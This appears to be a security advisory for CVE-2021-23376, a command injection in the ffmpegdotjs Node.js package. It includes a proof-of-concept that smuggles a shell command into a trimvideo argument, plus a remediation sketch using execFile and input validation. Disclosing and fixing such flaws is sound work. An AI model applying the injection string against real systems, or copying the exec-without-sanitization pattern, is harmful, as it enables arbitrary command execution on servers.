Arbitrary Command Injection

Affecting ffmpegdotjs package, ALL versions

Overview

ffmpegdotjs is an FFmpeg module for Node.js.

Affected versions of this package are vulnerable to Arbitrary Command Injection. If attacker-controlled user input is given to the trimvideo function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.

PoC (provided by reporter):

var ffmpegdotjs = require("ffmpegdotjs");

ffmpegdotjs.trimvideo("package-lock.json", 0, 30, "n || touch success; #").then((file) => {
  console.log(file);
});

(A file called success will be created as a result of the execution of touch success.)

Remediation

There is no fixed version for ffmpegdotjs.
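
With no fixed release, untrusted values have to be kept away from a shell by the calling code. The following is an added sketch, not code from ffmpegdotjs or the reporter: it validates the four trimvideo-style parameters against an allow-list and runs the binary with execFile and an argument array instead of exec. The function names, the ffmpeg argument layout and the commented-out vulnerable shape are assumptions.

```javascript
// Added example; not ffmpegdotjs code. Function names and the ffmpeg
// argument layout are assumptions made for illustration.
const { execFileSync } = require("node:child_process");

// Injection-prone shape (assumed; the advisory only states that exec is
// called without input sanitization):
//   exec("ffmpeg -i " + input + " -ss " + start + " -t " + duration + " " + output)
// The string is parsed by a shell, so metacharacters in any value become syntax.

// Allow-list for file names: no spaces, no shell metacharacters, no path
// separators, and no leading "-" that ffmpeg would read as an option.
const SAFE_NAME = /^[A-Za-z0-9_][A-Za-z0-9._-]{0,254}$/;

function buildTrimArgs(input, start, duration, output) {
  for (const [label, value] of [["input", input], ["output", output]]) {
    if (typeof value !== "string" || !SAFE_NAME.test(value)) {
      throw new TypeError(`${label} is not an allowed file name`);
    }
  }
  for (const [label, value] of [["start", start], ["duration", duration]]) {
    if (typeof value !== "number" || !Number.isFinite(value) || value < 0) {
      throw new TypeError(`${label} must be a non-negative number`);
    }
  }
  // One array element per argument: nothing is re-parsed as a command line.
  return ["-i", input, "-ss", String(start), "-t", String(duration), output];
}

// Runs a binary without a shell. Real use: runNoShell("ffmpeg", buildTrimArgs(...)).
function runNoShell(binary, args) {
  return execFileSync(binary, args, { encoding: "utf8" });
}

// Offline stand-in for ffmpeg: a child Node process reports the argv it
// received, showing that execFile delivers metacharacters as literal text.
function echoArgv(args) {
  const script = "console.log(JSON.stringify(process.argv.slice(1)))";
  return JSON.parse(runNoShell(process.execPath, ["-e", script, "--", ...args]));
}
```

The allow-list check can also be applied to values before they are passed to any wrapper that still builds a shell string; the execFile form removes the shell parsing step altogether.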

CVSS Score

9.8 (critical severity)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P

Credit: OmniTaint
CVE: CVE-2021-23376
CWE: CWE-77
Snyk ID: SNYK-JS-FFMPEGDOTJS-1078542
Disclosed: 23 Feb, 2021
Published: 18 Apr, 2021